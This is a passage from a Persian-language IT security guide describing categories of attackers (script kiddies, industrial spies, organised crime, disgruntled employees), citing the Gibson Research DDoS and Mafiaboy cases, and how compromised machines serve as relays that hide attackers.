ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺍﺯ ﻧﺎﻡ ﺁﻧﻬﺎ ﭘﻴﺪﺍﺳﺖ ،ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻣﻬﺎﺟﻤﻴﻦ ﻛﻮﺩﻛﺎﻥ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻫﺴﺘﻨﺪ؛ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﻣﺘﺄﺳـﻔﺎﻧﻪ ﻫﻨـﻮﺯ ﺑـﻪ ﺣـﺲ
ﻣﺴﺌﻮﻟﻴﺖ ﻭ ﺗﺸﺨﻴﺺ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺗﻜﻨﻴﻜﻲ ﺧﻮﺩ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ.
ﺑﻪ ﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﺒﺮﺓ ﺗﻬﺎﺟﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ) Script Kiddieﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ( ﻣﻲﮔﻮﻳﻨﺪ .ﺍﻳـﻦ ﻋﺒـﺎﺭﺕ ﺗﻤـﺴﺨﺮﺁﻣﻴﺰ
ﺍﺳﺖ .ﻭﺍﮊﺓ "ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ" ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﺣﻤـﻼﺕ ﺧـﻮﺩ ﺭﺍ ﭘﺪﻳـﺪ ﺁﻭﺭﻧـﺪ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﺗﻬﺎﺟﻤﻲ ﺁﻣﺎﺩﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ downloadﺷﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺁﻥ ﺟﻬﺖ "ﻓﺴﻘﻠﻲ" ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ
ﺳﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻫﻨﮕﺎﻡ ﺩﺳﺘﮕﻴﺮﻱ ﺯﻳﺮ ﺳﻦ ﻗﺎﻧﻮﻧﻲ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺗﻬﺪﻳﺪ ﻭ ﺧﻄﺮ ﺟﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﺁﻳﻨﺪ ،ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴـﻞ ﻛـﻪ ﺍﺯ ﻧﻮﺟـﻮﺍﻧﻲ ﻛـﻪ ﺍﺳـﻠﺤﻪ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ
ﺗﺮﺳﻴﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﺯ ﻧﻮﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺳﻠﺤﺔ ﺳﺒﻚ ﺣﻤﻞ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺣﺘﻲ ﺑﻴﺶ ﺍﺯ ﺑﺰﺭﮔﺴﺎﻻﻥ ﺗﺮﺳﻴﺪ ،ﭼﺮﺍ ﻛـﻪ ﻳـﻚ ﻧﻮﺟـﻮﺍﻥ
ﻭﻗﺘﻲ ﻣﻲﺧﻮﺍﻫﺪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ ﻛﻤﺘﺮ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻋﻤﻞ ﺧﻮﺩ ﺭﺍ ﺑﻔﻬﻤﺪ ﻭ ﻟﺬﺍ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ.
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻫﻢ ﺻﺪﻕ ﻣﻲﻛﻨﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺆﺳﺴﻪ ﺗﺤﻘﻴﻘﺎﺗﻲ ﮔﻴﺒﺴﻮﻥ ٣٦ﻫﺪﻑ
ﻳﻚ ﺗﻬﺎﺟﻢ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ ) ٣٧(DDoSﻗﺮﺍﺭ ﮔﺮﻓﺖ ﻛﻪ ﺁﻧﺮﺍ ﺑﻴﺶ ﺍﺯ ۱۷ﺳﺎﻋﺖ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ .ﺗﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺑـﻴﺶ ﺍﺯ ۴۰۰
ﺭﺍﻳﺎﻧﻪ ﻣﺒﺘﻨﻲ ﺑﺮ Windowsﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺍﺟﺮﺍ ﺭﺳﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﺧﻮﺩﻛﺎﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩﻧﺪ .ﻭﻗﺘـﻲ
ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ ،ﺍﺳﺘﻴﻮ ﮔﻴﺒﺴﻮﻥ ٣٨ﺗﻮﺍﻧﺴﺖ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺣﻤﻠﻪ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ،ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﻣﻬﻨﺪﺳﻲ ﻣﻌﻜﻮﺱ ﻭ ﺭﺩﻳﺎﺑﻲ ﻛﻨـﺪ.
ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﺸﺨﺺ ﺷﺪ ﻛﻪ ﻓﺮﺩ ﻣﻬﺎﺟﻢ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻭ ﻳﻚ ﺩﺧﺘﺮ ۱۳ﺳﺎﻟﻪ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺩﺭ ﻣﻮﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮﻱ ﻭﻗﺘﻲ ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻛﺎﻧﺎﺩﺍ ﺩﺭ ﻧﻮﺯﺩﻫﻢ ﺁﻭﺭﻳﻞ ﺳﺎﻝ "Mafiaboy" ۲۰۰۰ﺭﺍ ﺑﻪ ﺧﺎﻃﺮ ﺣﻤﻼﺕ ﻣﺎﻩ ﻓﻮﺭﻳﻪ ﺳـﺎﻝ
۲۰۰۰ﺍﻭ ﺑﻪ ،CNN ،E*TRADE ،Yahooﻭ ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﭘﺮ ﺍﺯ ﭘﺮﻭﺭﻧﺪﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﻣﻮﺟﺐ ۱/۷ﻣﻴﻠﻴـﺎﺭﺩ ﺩﻻﺭ
ﺧﺴﺎﺭﺕ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﺯﺩﺍﺷﺖ ﻛﺮﺩﻧﺪ ،ﻧﺘﻮﺍﻧﺴﺘﻨﺪ ﻧﺎﻡ ﻣﺘﻬﻢ ﺭﺍ ﺑﺮﺍﻱ ﻣﺮﺩﻡ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ؛ ﭼﺮﺍ ﻛﻪ ﭘـﺴﺮﺑﭽﺔ ۱۶ﺳـﺎﻟﻪ ،ﺗﺤـﺖ ﺣﻤﺎﻳـﺖ ﻗـﺎﻧﻮﻥ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻧﺪﮔﻲ ﺷﺨﺼﻲ ﺧﺮﺩﺳﺎﻻﻥ ﻛﺎﻧﺎﺩﺍ ﻗﺮﺍﺭ ﺩﺍﺷﺖ.
ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺭﺕ ﻓﻨﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻱ ﻣﺨﺼﻮﺹ ﺧـﻮﺩ ﺭﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ،
ﻭﻟﻲ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻳﺸﺎﻥ ﻣﺸﻜﻞ ﺯﻳﺎﺩﻱ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ .ﺁﻧﻬﺎ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﻳﺎ ﻧﻤﻲﻓﻬﻤﻨـﺪ
ﻣﻮﺟﺐ ﭼﻪ ﺧﺴﺎﺭﺍﺗﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺮﺍﻳﺸﺎﻥ ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ.
35 Kernel
36 Gibson Research Corporation
37 Distributed Denial of Service Attack
38 Steve Gibson
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٦٨
ﻳﻚ ﻓﺴﻘﻠﻲ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭﻗﺘﻲ ﺑﺰﺭﮒ ﺷﺪ ﭼﻜﺎﺭﻩ ﺧﻮﺍﻫﺪ ﺷﺪ؟ ﻫـﻴﭽﻜﺲ ﻫﻨـﻮﺯ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ؛ ﻫـﻴﭻ ﺑﺮﺭﺳـﻲ ﻣـﻮﺛﻘﻲ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ.
ﮔﺰﺍﺭﺷﻬﺎﻱ ﻏﻴﺮ ﺭﺳﻤﻲ ﻣﻲﮔﻮﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺭﺍﻩ ﺭﺍﺳﺖ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﻧﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻋﻼﻗﻪ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ
ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ ،ﺑﻌﻀﻲ ﻣﺘﺼﺪﻱ ﺳﻴﺴﺘﻢ ﻳﺎ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﺣﺘﻲ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺯﻣﻲﮔﺮﺩﻧﺪ )ﺍﺳﺘﺨﺪﺍﻡ ﭼﻨﻴﻦ
ﺍﻓﺮﺍﺩﻱ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺷﺒﻜﻪ ،ﺩﺭ ﻣﺠﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻨﻮﺯ ﻣﻮﺿﻮﻋﻲ ﻣﻮﺭﺩ ﻣﻨﺎﻗﺸﻪ ﺍﺳـﺖ( ،ﻭﻟﻲ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑـﻪ ﺯﻧـﺪﮔﻲ
ﺗﺒﻬﻜﺎﺭﺍﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ.
ﺟﺎﺳﻮﺳﻬﺎﻱ ﺻﻨﻌﺘﻲ
ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﺑﺎﺯﺍﺭ ﺳﻴﺎﻩ ﺩﺭﺣﺎﻝ ﺭﺷﺪﻱ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺳﺮﻗﺖﺷﺪﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻛﻮﺷﺶ ﻛﺮﺩﻩ-
ﻼ ﭘﻴﺸﻨﻬﺎﺩ ﺭﻓﻊ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ ﺩﺭ ﻗﺒـﺎﻝ ﺩﺭﻳﺎﻓـﺖ ﻣﺒـﺎﻟﻎ ﺍﻧﺪ ﺍﺯ ﺻﺎﺣﺒﺎﻥ ﻗﺎﻧﻮﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺟﮕﻴﺮﻱ ﻭ ﺍﺧﺎﺫﻱ ﻛﻨﻨﺪ .ﻣﺜ ﹰ
ﻫﻨﮕﻔﺖ ﺭﺍ ﺩﺍﺩﻩﺍﻧﺪ .ﭼﻨﺪﻳﻦ ﻣﻮﺭﺩ ﻣﺴﺘﻨﺪ )ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻣﻮﺍﺭﺩ ﻣﺘﻌﺪﺩ ﮔﺰﺍﺭﺵ ﻧﺸﺪﻩ( ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺍﺳـﺖ ﻛـﻪ ﺩﺭ ﺁﻧﻬـﺎ ﻣﺠﺮﻣـﺎﻥ ،ﺷـﻤﺎﺭﺓ ﻛﺎﺭﺗﻬـﺎﻱ
ﺍﻋﺘﺒﺎﺭﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻳﻚ ﺷﺮﻛﺖ ﺩﺯﺩﻳﺪﻩ ﻭ ﺗﻬﺪﻳﺪ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﺧﻮﺍﻫﻨﺪ ﻛـﺮﺩ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺷـﺮﻛﺖ
ﺑﻬﺎﻳﻲ ﺑﻪ ﺁﻧﻬﺎ ﺑﭙﺮﺩﺍﺯﺩ .ﻫﻤﭽﻨﻴﻦ ﮔﺰﺍﺭﺷﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﻣﻬﺎﺟﻤﻴﻨﻲ ﺳﻌﻲ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺮﺍﺭ ﺻﻨﻌﺘﻲ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻔﻮﺫ
ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﺭﻗﺒﺎﻳﺸﺎﻥ ﺑﻔﺮﻭﺷﻨﺪ .ﺍﻳﻦ ﻣﻌﺎﻣﻼﺕ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﻳﮕـﺮ -ﻭ ﺍﻟﺒﺘـﻪ ﻧـﻪ ﻫﻤـﻪ ﻛـﺸﻮﺭﻫﺎ -
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﺪﻩ ﺍﺳﺖ.
ﺟﺮﻡ ﺳﺎﺯﻣﺎﻥﻳﺎﻓﺘﻪ
ﺭﻭﺯﺍﻧﻪ ﻣﻘﺎﺩﻳﺮ ﻫﻨﮕﻔﺘﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭﺣﺎﻝ ﺗﺒﺎﺩﻝ ﺍﺳﺖ .ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺍﺳﺖ ﻛﻪ ﺗﺼﻮﺭ ﺷﻮﺩ ﻋﻨﺎﺻـﺮ
ﺗﺒﻬﻜﺎﺭ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺭﻧﺪ ،ﻳﺎ ﻋﻼﻗﻪﻣﻨﺪ ﻧﻴﺴﺘﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﻬﺎﻥ ﺷـﺒﻜﻪﺷـﺪﻩ ﮔـﺴﺘﺮﺵ ﺩﻫﻨـﺪ .ﺣﻤﻠـﻪﻫـﺎﻳﻲ ﺍﺯ ﻗﺒﻴـﻞ
ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﺩﺯﺩﻱ ﺍﻃﻼﻋﺎﺕ ،ﻭ ﭘﻮﻟﺸﻮﺋﻲ ﻛﻪ ﺑﺼﻮﺭﺕ onlineﻫﺪﺍﻳﺖ ﺷﺪﻩ ﺭﺥ ﺩﺍﺩﻩ ﺍﺳﺖ ﻛﻪ ﻣﻘﺎﻣـﺎﺕ ﻣـﺴﺌﻮﻝ ﻣﻌﺘﻘﺪﻧـﺪ ﻫﻤﮕـﻲ ﺩﺭ
ﺯﻣﺮﺓ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻫﺴﺘﻨﺪ .ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﮔﺴﺘﺮﺵ ﻭ ﻫﻤﺎﻫﻨﮕﻲ ﺧﻮﺩﻓﺮﻭﺷﻲﻫﺎ ﻭ ﻓﺤـﺸﺎ ،ﻗﻤـﺎﺭ ،ﺳـﻮﺩﺍﮔﺮﻱ ﺑـﺎ ﻣـﻮﺍﺩ
ﻻ ﻣﺸﻤﻮﻝ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﻣﻲﺷﻮﺩ ،ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻋـﻼﻭﻩ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ،ﻫﺠﻮﻡ ﻣﺴﻠﺤﺎﻧﻪ ،ﻭ ﺳﺎﻳﺮ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺑﺮ ﺁﻥ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﻣﺠﺮﻣﻴﻦ ﺑﺮﺍﻱ ﻛﺸﻒ ﺁﻧﭽﻪ ﺩﻭﻟﺖ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺁﻧﻬﺎ ﻣﻲﺩﺍﻧـﺪ ﻳـﺎ ﻛـﺸﻒ ﻣﺸﺨـﺼﺎﺕ ﺧﺒـﺮ
ﺭﺳﺎﻧﺎﻥ ﻭ ﺷﻬﻮﺩ ،ﻣﻮﺭﺩ ﻫﺪﻑ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
٢٦٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺎ ﺟﻬﺎﻧﻲ ﺷﺪﻥ ﺷﺒﻜﻪ ،ﺗﻬﺪﻳﺪﺍﺕ ﮔﺴﺘﺮﺓ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ .ﺍﻣﺮﻭﺯﻩ ﺩﻳﮕﺮ ﺑﺎﻧﺪ ﺩﺯﺩﺍﻥ ﺭﻭﺳﻲ ،ﻣﺎﻓﻴﺎﺋﻲﻫﺎﻱ ﺳﻴـﺴﻴﻞ ،ﻳـﺎﻛﻮﺯﺍﻱ ﮊﺍﭘـﻦ،
ﺗﺠﺎﺭ ﻣﻮﺍﺩ ﻣﺨﺪﺭ ﺩﺭ ﺁﻣﺮﻳﻜﺎﻱ ﺟﻨﻮﺑﻲ ،ﻭ ﮔﺮﻭﻩ ﺍﺭﺍﺫﻝ ﻭ ﺍﻭﺑﺎﺵ ﻟﺲ ﺁﻧﺠﻠﺲ ،ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺭﻭﻱ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﻛﻠﻴـﻚ ﻣـﺎﻭﺱ ﺍﺯ
ﻣﺎ ﻓﺎﺻﻠﻪ ﺩﺍﺭﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻘﺎﻣﺎﺕ ﺩﺍﻳﺮﻩ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﻫﻪ ﺁﻳﻨﺪﻩ ﻣﺤﻞ ﺭﺷﺪ ﺟﺮﺍﺋﻢ ﺍﺳﺖ ﻧﮕﺮﺍﻧﻨﺪ.
ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻼﺵ
ﻭ ﺑﺎﻻﺧﺮﻩ ،ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻣﻬﺎﺭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻡ ،ﻛﻴﻨﻪﺗﻮﺯﻱ ،ﻳﺎ ﺍﺫﻳﺖ ﻭ ﺁﺯﺍﺭ ،ﻋﻠﻴﻪ ﻛﺎﺭﻓﺮﻣﺎﻳﺎﻥ ﺧﻮﺩ ﺍﻗﺪﺍﻡ ﻛﺮﺩﻩﺍﻧـﺪ.
ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ،ﻛﺎﺭﻛﻨﺎﻥ ﺍﺧﺮﺍﺝ ﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺟﺎ ﺩﺍﺩﻩﺍﻧﺪ.
ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺗﺒﺪﻳﻞ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻋﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺷﻮﺩ ﺩﻻﻳﻞ ﺯﻳﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ.
ﺍﮔﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﺑﺎ ﺳﺮﻋﺖ ﺑﺎﻻ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺧﺮﺍﺑﻲ ﻭ ﺍﺧﺘﻼﻝ ﺑﻴﺸﺘﺮﻱ ﻧﺴﺒﺖ ﺑـﻪ ﺳـﺎﻳﺮ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺟﻢ ﺑﺎﻋﺚ ﺷﻮﺩ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻪ ﺗﺴﺨﻴﺮ ﺩﺭﺁﻣﺪﻩ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﻛـﺎﺭ ﻣـﺴﺌﻮﻟﻴﻦ ﺩﺭ
ﺭﺩﻳﺎﺑﻲ ﻛﺎﺭﻫﺎﻱ ﻣﻬﺎﺟﻢ ﺗﺎ ﺭﺳﻴﺪﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺍﮔﺮ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺣﻮﺯﻩﻫـﺎﻱ
ﻣﺨﺘﻠﻔﻲ ﺑﺠﻬﺪ -ﻣﺜﻼﹰ ،ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺗﺤﺖ Unixﺩﺭ ﻓﺮﺍﻧﺴﻪ ﺗﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ proxyﻣﺒﺘﻨﻲ ﺑـﺮ windowsﺩﺭ ﻛـﺮﻩ
ﺟﻨﻮﺑﻲ ،ﻭ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﺔ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺩﺭ ﻣﻜﺰﻳﻚ ﺗﺎ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﺷﺎﻫﺮﺍﻩ ٤٠ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ -ﻣﻤﻜﻦ ﺍﺳـﺖ ﻭﺍﻗﻌـﹰﺎ ﺭﺩﻳـﺎﺑﻲ ﻣﻌﻜـﻮﺱ
ﻣﻬﺎﺟﻢ ﺑﻪ ﺳﻤﺖ ﻣﺒﺪﺃ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
Botﻫﺎ
